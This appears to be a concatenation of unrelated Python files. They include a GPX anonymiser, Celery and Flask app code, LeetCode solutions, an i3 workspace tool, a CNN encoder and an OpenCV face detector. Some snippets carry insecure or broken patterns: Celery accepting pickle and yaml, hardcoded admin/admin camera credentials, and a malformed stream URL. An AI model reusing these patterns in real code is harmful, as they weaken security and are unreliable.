usage : tJOG.py [-h] [-ADL] <inputfile>
-h : (optional) display help
-ADL : (optional) set the origin to the city centre of Adelaide (Australia, South Australia)
The output file tJOG_<inputfile> is created, with origin removed/replaced
e.g. tJOG.py -ADL test.gpx
https://github.com/micooke/tJOG
@license: MIT
@copyright: Copyright 2018, Mark Cooke
@author: Mark Cooke (https://github.com/micooke)
"""
import os
import sys
import re
def main():
url = 'https://github.com/micooke/tJOG'
usage = 'usage : tJOG.py [-h] [-ADL] <inputfile>'
inputfile = ''
outputfile = ''
latOffset = 0.0
lonOffset = 0.0
# input sanitisation
if len(sys.argv) > 1:
if sys.argv[1] in {'-h','--help'}:
print(usage)
return 0
elif sys.argv[1] in {'-ADL'}:
latOffset = -34.9286600
lonOffset = 138.5986300
inputfile = sys.argv[2]
elif os.path.isfile(sys.argv[1]):
inputfile = sys.argv[1]
else:
print('error: inputfile "'+sys.argv[1]+'" does not exist')
return 1
else:
print(usage)
return 1
# generate the output filename
outputfile = 'tJOG_'+os.path.splitext(inputfile)[0]+'.gpx'
print('Input file :', inputfile)
print('Output file :', outputfile)
# open the input file and read the contents
with open(inputfile, 'r' ) as f:
content = f.read()
## look for the first lat, lon and assume this is the 'origin'
# generate the lat,lon search pattern
pattern = re.compile('lat="([^"]+)" lon="([^"]+)"')
# find the first lat,lon instance
LatLon = pattern.search(content).groups()
# if the string is incomplete, there is no data
if len(LatLon) != 2:
print('error : No lat,lon information found in the gpx file')
return 1
# get the run origin
lat0 = float(LatLon[0])
lon0 = float(LatLon[1])
# replace each lat,lon instance
iterator = pattern.finditer(content)
for m in iterator:
# get the group
LatLon = m.groups()
# set the origin to lat,lon = 0,0
lat_ = float(LatLon[0]) - lat0 + latOffset
lon_ = float(LatLon[1]) - lon0 + lonOffset
# format the lat,lon information to 7 decimal places
lat_ = "{:.7f}".format(lat_)
lon_ = "{:.7f}".format(lon_)
# replace the appropriate contents
content = content.replace(LatLon[0], lat_)
content = content.replace(LatLon[1], lon_)
# replace the creator details
s = re.search('creator="([^"]+)"', content).groups()
content = content.replace(s[0], url)
# write the content to the output file
with open(outputfile, 'w' ) as f:
f.write(content)
# normal program return
return 0
if __name__=="__main__":
result = main()
if result > 0:
sys.exit(result) |
"""
File largely based on sample celery.py file from documentation
for working with Celery and Django here:
http://docs.celeryproject.org/en/latest/django/first-steps-with-django.html
"""
from __future__ import absolute_import
import os
from celery import Celery
from django.conf import settings
# Set the default Django settings module for the 'celery' program
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'tribe.settings')
app = Celery('tribe')
# Using a string here means the worker will not have to
# pickle the object when using Windows.
app.config_from_object('django.conf:settings')
app.autodiscover_tasks(lambda: settings.INSTALLED_APPS)
app.conf.update(
CELERY_RESULT_BACKEND='djcelery.backends.database:DatabaseBackend',
CELERY_ACCEPT_CONTENT=['pickle', 'json', 'yaml']
)
@app.task(bind=True)
def debug_task(self):
print('Request: {0!r}'.format(self.request))
|
__________________________________________________________________________________________________
sample 84 ms submission
class Solution:
def removeCoveredIntervals(self, intervals: List[List[int]]) -> int:
if not intervals: return 0
intervals.sort()
L, R = intervals[0]
for i in range(1, remaining := len(intervals)):
l, r = intervals[i]
if L <= l and R >= r: remaining -= 1
else: L, R = l, r
return remaining
__________________________________________________________________________________________________
sample 88 ms submission
class Solution:
def removeCoveredIntervals(self, intervals: List[List[int]]) -> int:
intervals.sort()
remain_lst = []
cur_left, cur_right = intervals[0]
count = 1
for interval in intervals:
if cur_left == interval[0]:
cur_right = interval[1]
else:
if cur_right >= interval[1]:
continue
else:
cur_left, cur_right = interval
count += 1
return count
__________________________________________________________________________________________________
|
from pyglet.graphics import Batch
class Scene():
def __init__(self, game=None, context=None):
self.game = game
self.batch = Batch()
self.context = context or {}
def load(self):
pass
def unload(self):
pass
def draw(self):
self.batch.draw()
def resize(self):
pass
def on_key_press(self, symbol, modifiers):
pass
def on_key_release(self, symbol, modifiers):
pass
|
#!/usr/bin/env python3
import copy
from typing import List, Optional, Tuple
import i3ipc
from i3wsgroups import i3_proxy, icons, logger
from i3wsgroups import workspace_names as ws_names
# from i3wsgroups.ws_names import *
GroupToWorkspaces = ws_names.GroupToWorkspaces
OrderedWorkspaceGroups = List[Tuple[str, List[i3ipc.Con]]]
logger = logger.logger
class WorkspaceGroupsError(Exception):
pass
# pylint: disable=too-few-public-methods
class ActiveGroupContext:
@staticmethod
def get_group_name(_: i3ipc.Con,
group_to_workspaces: GroupToWorkspaces) -> str:
# Return the first group which is defined as the active one.
return next(iter(group_to_workspaces))
# pylint: disable=too-few-public-methods
class FocusedGroupContext:
@staticmethod
def get_group_name(tree: i3ipc.Con, _: GroupToWorkspaces) -> str:
focused_workspace = tree.find_focused().workspace()
return ws_names.get_group(focused_workspace)
# pylint: disable=too-few-public-methods
class NamedGroupContext:
def __init__(self, group_name: str):
self.group_name = group_name
def get_group_name(self, _: i3ipc.Con, __: GroupToWorkspaces) -> str:
return self.group_name
class WorkspaceGroupsController:
def __init__(self,
i3_proxy_: i3_proxy.I3Proxy,
add_window_icons: bool = False,
add_window_icons_all_groups: bool = False,
renumber_workspaces: bool = False):
self.i3_proxy = i3_proxy_
self.add_window_icons = add_window_icons
self.add_window_icons_all_groups = add_window_icons_all_groups
self.renumber_workspaces = renumber_workspaces
def get_tree(self, cached: bool = True) -> i3ipc.Con:
return self.i3_proxy.get_tree(cached)
def organize_workspace_groups(self,
workspace_groups: OrderedWorkspaceGroups,
monitor_name: Optional[str] = None) -> None:
if monitor_name is None:
monitor_name = self.i3_proxy.get_focused_monitor_name()
monitor_index = self.i3_proxy.get_monitor_index(monitor_name)
group_to_all_workspaces = ws_names.get_group_to_workspaces(
self.get_tree().workspaces())
for group_index, (group, workspaces) in enumerate(workspace_groups):
logger.debug('Organizing workspace group: "%s" in monitor "%s"',
group, monitor_name)
local_numbers = ws_names.compute_local_numbers(
workspaces, group_to_all_workspaces.get(group, []),
self.renumber_workspaces)
for workspace, local_number in zip(workspaces, local_numbers):
ws_metadata = ws_names.parse_name(workspace.name)
ws_metadata.group = group
ws_metadata.local_number = local_number
ws_metadata.global_number = ws_names.compute_global_number(
monitor_index, group_index, local_number)
dynamic_name = ''
# Add window icons if needed.
if self.add_window_icons_all_groups or (self.add_window_icons
and group_index == 0):
dynamic_name = icons.get_workspace_icons_representation(
workspace)
ws_metadata.dynamic_name = dynamic_name
new_name = ws_names.create_name(ws_metadata)
self.i3_proxy.rename_workspace(workspace.name, new_name)
workspace.name = new_name
def list_groups(self, monitor_only: bool = False) -> List[str]:
workspaces = self.get_tree().workspaces()
if monitor_only:
workspaces = self.i3_proxy.get_monitor_workspaces()
group_to_workspaces = ws_names.get_group_to_workspaces(workspaces)
return list(group_to_workspaces.keys())
def list_workspaces(self,
group_context,
focused_only: bool = False,
monitor_only: bool = False) -> List[i3ipc.Con]:
workspaces = self.get_tree().workspaces()
if monitor_only:
workspaces = self.i3_proxy.get_monitor_workspaces()
group_to_workspaces = ws_names.get_group_to_workspaces(workspaces)
# If no context group specified, return workspaces from all groups.
if not group_context:
group_workspaces = sum(
(list(workspaces)
for workspaces in group_to_workspaces.values()), [])
else:
group_name = group_context.get_group_name(self.get_tree(),
group_to_workspaces)
group_workspaces = group_to_workspaces.get(group_name, [])
if not focused_only:
return group_workspaces
focused_workspace = self.get_tree().find_focused().workspace()
return [ws for ws in group_workspaces if ws.id == focused_workspace.id]
def _create_new_active_group_workspace_name(self, monitor_name: str,
target_group: str) -> i3ipc.Con:
group_to_all_workspaces = ws_names.get_group_to_workspaces(
self.get_tree().workspaces())
used_local_numbers = ws_names.get_used_local_numbers(
group_to_all_workspaces.get(target_group, []))
local_number = next(
iter(ws_names.get_lowest_free_local_numbers(1, used_local_numbers)))
global_number = ws_names.compute_global_number(
monitor_index=self.i3_proxy.get_monitor_index(monitor_name),
group_index=0,
local_number=local_number)
ws_metadata = ws_names.WorkspaceGroupingMetadata(
group=target_group,
global_number=global_number,
local_number=local_number)
return ws_names.create_name(ws_metadata)
def switch_monitor_active_group(self, monitor_name: str,
target_group: str) -> None:
monitor_workspaces = self.i3_proxy.get_monitor_workspaces(monitor_name)
group_to_monitor_workspaces = ws_names.get_group_to_workspaces(
monitor_workspaces)
reordered_group_to_workspaces = [
(target_group, group_to_monitor_workspaces.get(target_group, []))
]
for group, workspaces in group_to_monitor_workspaces.items():
if group != target_group:
reordered_group_to_workspaces.append((group, workspaces))
self.organize_workspace_groups(reordered_group_to_workspaces,
monitor_name)
def switch_active_group(self, target_group: str,
focused_monitor_only: bool) -> None:
focused_monitor_name = self.i3_proxy.get_focused_monitor_name()
monitor_to_workspaces = self.i3_proxy.get_monitor_to_workspaces()
for monitor, workspaces in monitor_to_workspaces.items():
group_exists = (
target_group in ws_names.get_group_to_workspaces(workspaces))
if monitor == focused_monitor_name:
logger.debug('Switching active group in focused monitor "%s"',
monitor)
elif not focused_monitor_only and group_exists:
logger.debug(
'Non focused monitor %s has workspaces in the group "%s", '
'switching to it.', monitor, target_group)
else:
continue
self.switch_monitor_active_group(monitor, target_group)
# NOTE: We only switch focus to the new workspace after renaming all the
# workspaces in all monitors and groups. Otherwise, if the previously
# focused workspace was renamed, i3's `workspace back_and_forth` will
# switch focus to a non-existant workspace name.
focused_group = ws_names.get_group(
self.get_tree().find_focused().workspace())
# The target group is already focused, no need to do anything.
if focused_group == target_group:
return
group_to_monitor_workspaces = ws_names.get_group_to_workspaces(
monitor_to_workspaces[focused_monitor_name])
# The focused monitor doesn't have any workspaces in the target group,
# so create one.
if target_group in group_to_monitor_workspaces:
workspace_name = group_to_monitor_workspaces[target_group][0].name
else:
workspace_name = self._create_new_active_group_workspace_name(
focused_monitor_name, target_group)
self.i3_proxy.focus_workspace(workspace_name, auto_back_and_forth=False)
def _create_workspace_name(self,
metadata: ws_names.WorkspaceGroupingMetadata
) -> str:
focused_monitor_name = self.i3_proxy.get_focused_monitor_name()
monitor_index = self.i3_proxy.get_monitor_index(focused_monitor_name)
group_to_monitor_workspaces = ws_names.get_group_to_workspaces(
self.i3_proxy.get_monitor_workspaces(focused_monitor_name))
group_index = ws_names.get_group_index(metadata.group,
group_to_monitor_workspaces)
metadata = copy.deepcopy(metadata)
metadata.global_number = ws_names.compute_global_number(
monitor_index, group_index, (metadata.local_number))
return ws_names.create_name(metadata)
# If an existing workspace matches certain properties of the given metadata,
# return its name and id. Otherwise, create and return a new workspace name
# from the given metadata. In this case, if there is an existing conflicting
# workspace, i.e. with the same (group, local_number), return its id as
# well.
# Note that only the group, local number, and static name are considered.
def _derive_workspace(self, metadata: ws_names.WorkspaceGroupingMetadata
) -> Tuple[str, Optional[int]]:
# i3 commands like `workspace number n` will focus on an existing
# workspace in another monitor if possible. To preserve this behavior,
# we check the group workspaces in all monitors.
group_to_all_workspaces = ws_names.get_group_to_workspaces(
self.get_tree().workspaces())
# Every workspace must have a unique (group, local_number) pair. This
# tracks whether we found a workspace that conflicts with the given
# (group, local_number).
for workspace in group_to_all_workspaces.get(metadata.group, []):
if not ws_names.get_local_workspace_number(
workspace) == metadata.local_number:
continue
static_name = ws_names.parse_name(workspace.name).static_name
if metadata.static_name is None or (
metadata.static_name == static_name):
return (workspace.name, workspace.id)
return (self._create_workspace_name(metadata), workspace.id)
# is_available = False
return (self._create_workspace_name(metadata), None)
def _get_group_from_context(self, group_context):
group_context = group_context or ActiveGroupContext()
focused_monitor_name = self.i3_proxy.get_focused_monitor_name()
group_to_monitor_workspaces = ws_names.get_group_to_workspaces(
self.i3_proxy.get_monitor_workspaces(focused_monitor_name))
target_group = group_context.get_group_name(
self.get_tree(), group_to_monitor_workspaces)
logger.info('Context group: "%s"', target_group)
return target_group
def focus_workspace_number(self, group_context,
target_local_number: int) -> None:
target_workspace_name, _ = self._derive_workspace(
ws_names.WorkspaceGroupingMetadata(
group=self._get_group_from_context(group_context),
local_number=target_local_number))
logger.debug('Derived workspace name: "%s"', target_workspace_name)
self.i3_proxy.focus_workspace(target_workspace_name)
def move_to_workspace_number(self, group_context,
target_local_number: int) -> None:
target_workspace_name, _ = self._derive_workspace(
ws_names.WorkspaceGroupingMetadata(
group=self._get_group_from_context(group_context),
local_number=target_local_number))
self.i3_proxy.send_i3_command(
'move container to workspace "{}"'.format(target_workspace_name))
def _relative_workspace_in_group(self,
offset_from_current: int = 1) -> i3ipc.Con:
focused_workspace = self.get_tree().find_focused().workspace()
focused_group = ws_names.get_group(focused_workspace)
group_workspaces_all_monitors = ws_names.get_group_to_workspaces(
self.get_tree().workspaces())[focused_group]
current_workspace_index = 0
for (current_workspace_index,
workspace) in enumerate(group_workspaces_all_monitors):
if workspace.id == focused_workspace.id:
break
next_workspace_index = (current_workspace_index + offset_from_current
) % len(group_workspaces_all_monitors)
return group_workspaces_all_monitors[next_workspace_index]
def focus_workspace_relative(self, offset_from_current: int) -> None:
next_workspace = self._relative_workspace_in_group(offset_from_current)
self.i3_proxy.focus_workspace(next_workspace.name,
auto_back_and_forth=False)
def move_workspace_relative(self, offset_from_current: int) -> None:
next_workspace = self._relative_workspace_in_group(offset_from_current)
self.i3_proxy.send_i3_command('move container to workspace "{}"'.format(
next_workspace.name))
def update_focused_workspace(
self, metadata_updates: ws_names.WorkspaceGroupingMetadata) -> None:
focused_workspace = self.get_tree().find_focused().workspace()
metadata = ws_names.parse_name(focused_workspace.name)
if metadata_updates.group is not None and (
not ws_names.is_valid_group_name(metadata_updates.group)):
raise WorkspaceGroupsError(
'Invalid group name provided: "{}"'.format(
metadata_updates.group))
for section in ['group', 'local_number', 'static_name']:
value = getattr(metadata_updates, section)
if value is not None:
setattr(metadata, section, value)
global_name, workspace_id = self._derive_workspace(metadata)
if workspace_id is not None and workspace_id != focused_workspace.id:
raise WorkspaceGroupsError(
'Workspace with local number "{}" already exists in group: '
'"{}": "{}"'.format(metadata.local_number, metadata.group,
global_name))
self.i3_proxy.rename_workspace(focused_workspace.name, global_name)
|
import math
from decimal import Decimal
from .probability import roll_chance, roll_success_range
from .action import max_actions
def max_shots(group):
"""
Returns the max number of shots a weapon can achieve in a turn.
Takes into consideration that the weapon may have to reload.
"""
return max_actions(100, group["time_units"], 15, group["burst"])
def burst(group):
"""
Returns the number of shots the fire mode will make.
"""
if group["fire_mode"] == "auto":
shots = 3
else:
shots = 1
return shots
def chance_to_damage(damage, armor):
"""
Returns the chance to damage against the received armor.
"""
min_prop = 0.5
max_prop = 1.5
min_damage = min_prop * damage
max_damage = max_prop * damage
return roll_chance(Decimal(min_damage), Decimal(max_damage), Decimal(armor))
def penetrating_damage(base_damage, armor):
"""
Returns the damage after applying armor.
"""
min_prop = 0.5
max_prop = 1.5
min_damage = min_prop * base_damage
max_damage = max_prop * base_damage
values = roll_success_range(min_damage, max_damage, armor, normalize=True)
if values:
damage = (values["min"] + values["max"]) / 2
else:
damage = 0
return damage
def hits_to_kill(damage, health):
"""
Returns the number of hits it takes to kill the target.
"""
if damage > 0:
hits = health / damage
else:
hits = math.inf
if hits < 1:
hits = 1
elif hits < math.inf:
hits = math.ceil(hits)
return hits
|
import explorerhat as eh
from time import sleep
while True:
v1 = eh.analog.one.read()
celsius = 100.0 * (v1 - 0.5)
fahrenheit = 32 + 9 * celsius / 5.0
print('Temperature is %4.1f degrees C or %4.1f degrees F'
% (celsius, fahrenheit))
v2 = eh.analog.two.read()
light_level = 'low' if v2 > 3.5 else 'high'
print('Light level is %s' % light_level)
sleep(1)
|
#!/usr/local/bin/python3
bloco_attrs = ('bloco_id', 'bloco_style')
ul_attrs = ('ul_id', 'ul_style')
def filtra_attrs(attrs, permitidos):
return ' '.join(f'{k.split("_")[-1]}="{v}"' for k, v in attrs.items()
if k in permitidos)
def tag_bloco(conteudo, *args, classe='success', inline=False, **novos_attrs):
tag = 'span' if inline else 'div'
conteudo = conteudo if not callable(conteudo) else conteudo(
*args, **novos_attrs)
attrs = filtra_attrs(novos_attrs, bloco_attrs)
return f'<{tag} class={classe} {attrs}>{conteudo}</{tag}>'
def tag_lista(*itens, **novos_attrs):
lista = ''.join(f'<li>{item}</li>' for item in itens)
attrs = filtra_attrs(novos_attrs, ul_attrs)
return f'<ul {attrs}>{lista}</ul>'
if __name__ == '__main__':
print(tag_bloco('teste1', bloco_style='teste'))
print(tag_bloco('teste2', inline=True))
print(tag_bloco('teste3', classe='danger'))
print(tag_lista('teste1', 'teste2'))
print(
tag_bloco(
tag_lista,
'teste1',
'teste2',
classe='danger',
bloco_style='style_bloco',
ul_style='style_ul'))
|
def pony_func(func):
"""Decorator to mark expose a method to a PonyDebugger caller."""
func.is_pony_func = True
return func
class BasePonyDomain(object):
STATIC_FUNCS = {}
def __init__(self, client):
self.client = client
self.enabled = False
@pony_func
def enable(self, params):
self.enabled = True
@pony_func
def disable(self, params):
self.enabled = False
|
#OSBS mining
from src import predict
from src import data
from src import neon_paths
from glob import glob
import pandas as pd
import geopandas as gpd
from src.start_cluster import start
from distributed import wait
import os
import re
import traceback
def find_rgb_files(site, year, config):
tiles = glob(config["rgb_sensor_pool"], recursive=True)
tiles = [x for x in tiles if site in x]
tiles = [x for x in tiles if "/{}/".format(year) in x]
return tiles
def convert(rgb_path, hyperspectral_pool, year, savedir):
#convert .h5 hyperspec tile if needed
basename = os.path.basename(rgb_path)
geo_index = re.search("(\d+_\d+)_image", basename).group(1)
hyperspectral_h5_path = [x for x in hyperspectral_pool if geo_index in x]
hyperspectral_h5_path = [x for x in hyperspectral_h5_path if year in x][0]
tif_basename = os.path.splitext(os.path.basename(rgb_path))[0] + "_hyperspectral.tif"
tif_path = "{}/{}".format(savedir, tif_basename)
if not os.path.exists(tif_path):
tif_path = neon_paths.convert_h5(hyperspectral_h5_path, rgb_path, savedir)
return tif_path
config = data.read_config("config.yml")
tiles = find_rgb_files(site="OSBS", config=config, year="2019")
#generate HSI_tif data if needed.
hyperspectral_pool = glob(config["HSI_sensor_pool"], recursive=True)
rgb_pool = glob(config["rgb_sensor_pool"], recursive=True)
cpu_client = start(cpus=10)
tif_futures = cpu_client.map(convert, tiles, hyperspectral_pool=hyperspectral_pool, savedir = config["HSI_tif_dir"], year="2019")
wait(tif_futures)
species_model_path = "/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/5d25a170b129462bbbd5815547e77d41.pl"
dead_model_path = "/orange/idtrees-collab/DeepTreeAttention/Dead/snapshots/9192d967fa324eecb8cf2107e4673a00.pl"
hsi_tifs = []
for x in tif_futures:
try:
hsi_tifs.append(x.result())
except:
pass
cpu_client.close()
gpu_client = start(gpus=10, mem_size="50GB")
#No daemonic dask children
config["workers"] = 0
futures = []
for x in hsi_tifs:
future = gpu_client.submit(predict.predict_tile, x, dead_model_path = dead_model_path, species_model_path=species_model_path, config=config)
futures.append(future)
wait(futures)
predictions = []
for future in futures:
try:
trees = future.result()
if not trees.empty:
predictions.append(trees)
except Exception as e:
print(e)
print(traceback.print_exc())
predictions = pd.concat(predictions)
predictions = gpd.GeoDataFrame(predictions, geometry="geometry")
predictions.to_file("results/OSBS_predictions.shp")
|
import cv2
import os
USERNAME = 'admin'
PASSWORD = 'admin'
IP = '192.168.1.107:8081'
PORT = '554'
os.environ["OPENCV_FFMPEG_CAPTURE_OPTIONS"] = "rtsp_transport;udp"
URL = 'https//{}:{}@{}/'.format(USERNAME, PASSWORD, IP, PORT)
print('Conectado com: ' + URL)
cap = cv2.VideoCapture(URL, cv2.CAP_FFMPEG)
faceCascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_default.xml')
eyesCascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_eye.xml')
smileCascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_smile.xml')
while True:
_, frame = cap.read()
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = faceCascade.detectMultiScale(
gray,
scaleFactor = 1.1,
minNeighbors = 5,
minSize = (30, 30)
)
#Face detection
for (x, y, w, h) in faces:
cv2.rectangle(frame, (x,y), (x+w, y+h), (0, 255, 0), 2)
#Eyes detection
eyes = eyesCascade.detectMultiScale(gray, 1.2, 18)
for (x, y, w, h) in eyes:
cv2.rectangle(frame, (x,y), (x+w, y+h), (255, 0, 0), 2)
#Smiles
smiles = smileCascade.detectMultiScale(gray, 1.7, 20)
for (x, y, w, h) in smiles:
cv2.rectangle(frame, (x,y), (x+w, y+h), (0, 0, 255), 2)
cv2.imshow("video", frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows() |
from torch import nn as nn
from .resnet import conv3x3x3, conv1x1x1
class MyronenkoConvolutionBlock(nn.Module):
def __init__(self, in_planes, planes, stride=1, norm_layer=None, norm_groups=8, kernel_size=3):
super(MyronenkoConvolutionBlock, self).__init__()
self.norm_groups = norm_groups
if norm_layer is None:
self.norm_layer = nn.GroupNorm
else:
self.norm_layer = norm_layer
self.norm1 = self.create_norm_layer(in_planes)
self.relu = nn.ReLU(inplace=True)
self.conv = conv3x3x3(in_planes, planes, stride, kernel_size=kernel_size)
def forward(self, x):
x = self.norm1(x)
x = self.relu(x)
x = self.conv(x)
return x
def create_norm_layer(self, planes, error_on_non_divisible_norm_groups=False):
if planes < self.norm_groups:
return self.norm_layer(planes, planes)
elif not error_on_non_divisible_norm_groups and (planes % self.norm_groups) > 0:
# This will just make a the number of norm groups equal to the number of planes
print("Setting number of norm groups to {} for this convolution block.".format(planes))
return self.norm_layer(planes, planes)
else:
return self.norm_layer(self.norm_groups, planes)
class MyronenkoResidualBlock(nn.Module):
def __init__(self, in_planes, planes, stride=1, norm_layer=None, norm_groups=8, kernel_size=3):
super(MyronenkoResidualBlock, self).__init__()
self.conv1 = MyronenkoConvolutionBlock(in_planes=in_planes, planes=planes, stride=stride,
norm_layer=norm_layer,
norm_groups=norm_groups, kernel_size=kernel_size)
self.conv2 = MyronenkoConvolutionBlock(in_planes=planes, planes=planes, stride=stride, norm_layer=norm_layer,
norm_groups=norm_groups, kernel_size=kernel_size)
if in_planes != planes:
self.sample = conv1x1x1(in_planes, planes)
else:
self.sample = None
def forward(self, x):
identity = x
x = self.conv1(x)
x = self.conv2(x)
if self.sample is not None:
identity = self.sample(identity)
x += identity
return x
class MyronenkoLayer(nn.Module):
def __init__(self, n_blocks, block, in_planes, planes, *args, dropout=None, kernel_size=3, **kwargs):
super(MyronenkoLayer, self).__init__()
self.block = block
self.n_blocks = n_blocks
self.blocks = nn.ModuleList()
for i in range(n_blocks):
self.blocks.append(block(in_planes, planes, *args, kernel_size=kernel_size, **kwargs))
in_planes = planes
if dropout is not None:
self.dropout = nn.Dropout3d(dropout, inplace=True)
else:
self.dropout = None
def forward(self, x):
for i, block in enumerate(self.blocks):
x = block(x)
if i == 0 and self.dropout is not None:
x = self.dropout(x)
return x
class MyronenkoEncoder(nn.Module):
def __init__(self, n_features, base_width=32, layer_blocks=None, layer=MyronenkoLayer, block=MyronenkoResidualBlock,
feature_dilation=2, downsampling_stride=2, dropout=0.2, layer_widths=None, kernel_size=3):
super(MyronenkoEncoder, self).__init__()
if layer_blocks is None:
layer_blocks = [1, 2, 2, 4]
self.layers = nn.ModuleList()
self.downsampling_convolutions = nn.ModuleList()
in_width = n_features
for i, n_blocks in enumerate(layer_blocks):
if layer_widths is not None:
out_width = layer_widths[i]
else:
out_width = base_width * (feature_dilation ** i)
if dropout and i == 0:
layer_dropout = dropout
else:
layer_dropout = None
self.layers.append(layer(n_blocks=n_blocks, block=block, in_planes=in_width, planes=out_width,
dropout=layer_dropout, kernel_size=kernel_size))
if i != len(layer_blocks) - 1:
self.downsampling_convolutions.append(conv3x3x3(out_width, out_width, stride=downsampling_stride,
kernel_size=kernel_size))
print("Encoder {}:".format(i), in_width, out_width)
in_width = out_width
def forward(self, x):
for layer, downsampling in zip(self.layers[:-1], self.downsampling_convolutions):
x = layer(x)
x = downsampling(x)
x = self.layers[-1](x)
return x
|
import pandas as pd
import numpy as np
from flask import (
Blueprint,
render_template,
abort, request,
make_response,
url_for,
redirect
)
from flask_login import login_required, current_user
from flask_api import status
# Bokeh imports.
from bokeh.embed import components
from bokeh.plotting import figure, ColumnDataSource
from bokeh.models import HoverTool
from bokeh.resources import INLINE
from bokeh.util.string import encode_utf8
# Thor Server imports.
from ..models import Experiment, Observation
from ..utils import decode_recommendation
from .. import db
experiment = Blueprint("experiment", __name__)
js_resources = INLINE.render_js()
css_resources = INLINE.render_css()
@experiment.route(
"/experiment/<int:experiment_id>/analysis/delete_pending/",
methods=["POST"]
)
@login_required
def delete_pending(experiment_id):
# Query for the corresponding experiment.
exp = Experiment.query.filter_by(
id=experiment_id, user_id=current_user.id
).first_or_404()
pending = exp.observations.filter(Observation.pending==True).all()
for obs in pending:
db.session.delete(obs)
db.session.commit()
return redirect(url_for("experiment.analysis_page",
experiment_id=experiment_id))
@experiment.route("/experiment/<int:experiment_id>/history/download/")
@login_required
def download_history(experiment_id):
# Query for the corresponding experiment.
experiment = Experiment.query.filter_by(id=experiment_id).filter(
(Experiment.user_id==current_user.id) | (Experiment.is_published==True)
).first_or_404()
# Parse the observations into a pandas dataframe.
dims = experiment.dimensions.all()
# obs = experiment.observations.filter(Observation.pending==False).all()
obs = experiment.observations.order_by("id").all()
X, y = decode_recommendation(obs, dims)
D = pd.DataFrame(X, columns=[d.name for d in dims])
D["target"] = y
D["obs_id"] = [o.id for o in obs]
D["date"] = [pd.datetime.strftime(o.date, '%Y-%m-%d %H:%M:%S')
for o in obs]
D["description"] = [o.description or "" for o in obs]
D.set_index('obs_id', inplace=True)
# Make a comma-separated variables file.
resp = make_response(D.to_csv())
resp.headers["Content-Disposition"] = "attachment; filename=export.csv"
resp.headers["Content-Type"] = "text/csv"
return resp
@experiment.route("/experiment/<int:experiment_id>/history/")
@login_required
def history_page(experiment_id):
# Query for the corresponding experiment.
experiment = Experiment.query.filter_by(id=experiment_id).filter(
(Experiment.user_id==current_user.id) | (Experiment.is_published==True)
).first_or_404()
return render_template(
"experiment.jinja2",
tab="history",
experiment=experiment
)
@experiment.route("/experiment/<int:experiment_id>/analysis/")
@login_required
def analysis_page(experiment_id):
# Query for the corresponding experiment.
experiment = Experiment.query.filter_by(id=experiment_id).filter(
(Experiment.user_id==current_user.id) | (Experiment.is_published==True)
).first()
# Grab the inputs arguments from the URL.
args = request.args
# Variable selector for analysis.
selected_dim = int(args.get("variable", 0))
if experiment:
dims = experiment.dimensions.all()
if experiment.observations.filter_by(pending=False).count() > 1:
obs = experiment.observations.filter_by(
pending=False
).order_by("date").all()
# Extract best observation so far.
X, y = decode_recommendation(obs, dims)
sd = dims[selected_dim]
# Construct tooltips on hover.
D = {d.name.replace(" ", "_"): X[:, i] for i, d in enumerate(dims)}
D["objective"] = y
source = ColumnDataSource(data=D)
hover = HoverTool(
tooltips=[("Objective", "@objective")] +
[(d.name, "@{}".format(d.name.replace(" ", "_"))) for d in dims],
names=["evals"]
)
# Visualize.
fig = figure(
title="Metric vs. Variable Scatter",
tools=["pan", "box_zoom", "reset", hover],
plot_height=225,
sizing_mode='scale_width',
x_axis_label="Variable",
x_axis_type="log" if sd.dim_type == "logarithmic" else "linear"
)
fig.circle(sd.name.replace(" ", "_"), "objective", source=source, name="evals")
fig.toolbar.logo = None
script, div = components(fig)
else:
script, div = "", ""
return encode_utf8(
render_template(
"experiment.jinja2",
tab="analysis",
selected_dim=selected_dim,
experiment=experiment,
plot_script=script,
plot_div=div,
js_resources=js_resources,
css_resources=css_resources,
)
)
else:
abort(404)
@experiment.route("/experiment/<int:experiment_id>/")
@login_required
def overview_page(experiment_id):
# Query for the corresponding experiment.
experiment = Experiment.query.filter_by(id=experiment_id).filter(
(Experiment.user_id==current_user.id) | (Experiment.is_published==True)
).first_or_404()
dims = experiment.dimensions.all()
if experiment.observations.filter_by(pending=False).count() > 1:
obs = experiment.observations.filter_by(
pending=False
).order_by("date").all()
# Decode the observations into a design matrix and a vector of targets.
X, y = decode_recommendation(obs, dims)
cummax = np.maximum.accumulate(y)
r = np.arange(1, cummax.shape[0] + 1, step=1)
# Construct tooltips on hover.
D = {d.name.replace(" ", "_"): X[:, i] for i, d in enumerate(dims)}
D["objective"] = y
D["r"] = r
source = ColumnDataSource(data=D)
hover = HoverTool(
tooltips=[("Objective", "@objective")] + [(d.name, "@{}".format(d.name.replace(" ", "_"))) for d in dims],
names=["evals"]
)
# Visualize the performance of the algorithm so far. This involves
# showing a cumulative best line alongside dots indicating the
# evaluation of the objective at each iteration. The plot is
# accompanied by tools for banning, zooming, tooltips on hover, and
# reseting the figure.
fig = figure(
title="Metric Improvement",
tools=["pan", "box_zoom", "reset", hover],
plot_height=225,
sizing_mode='scale_width',
x_axis_label="Number of Observations",
)
fig.line(r, cummax, line_width=2)
fig.circle("r", "objective", source=source, name="evals")
fig.toolbar.logo = None
script, div = components(fig)
else:
script, div = "", ""
return encode_utf8(
render_template(
"experiment.jinja2",
tab="overview",
experiment=experiment,
plot_script=script,
plot_div=div,
js_resources=js_resources,
css_resources=css_resources,
)
)
@experiment.route("/experiment/<int:experiment_id>/admin/")
@login_required
def admin_page(experiment_id):
# Query for the corresponding experiment.
experiment = Experiment.query.filter_by(
id=experiment_id, user_id=current_user.id
).first_or_404()
return render_template(
"experiment.jinja2",
tab="admin",
experiment=experiment
)
@experiment.errorhandler(404)
def page_not_found(e):
return render_template("404.jinja2"), status.HTTP_404_NOT_FOUND
|
# coding: utf-8
"""The django_nose module."""
from __future__ import unicode_literals
VERSION = (1, 4, 1)
__version__ = '.'.join(map(str, VERSION))
from django_nose.runner import BasicNoseRunner, NoseTestSuiteRunner
from django_nose.testcases import FastFixtureTestCase
assert BasicNoseRunner
assert FastFixtureTestCase
# Django < 1.2 compatibility.
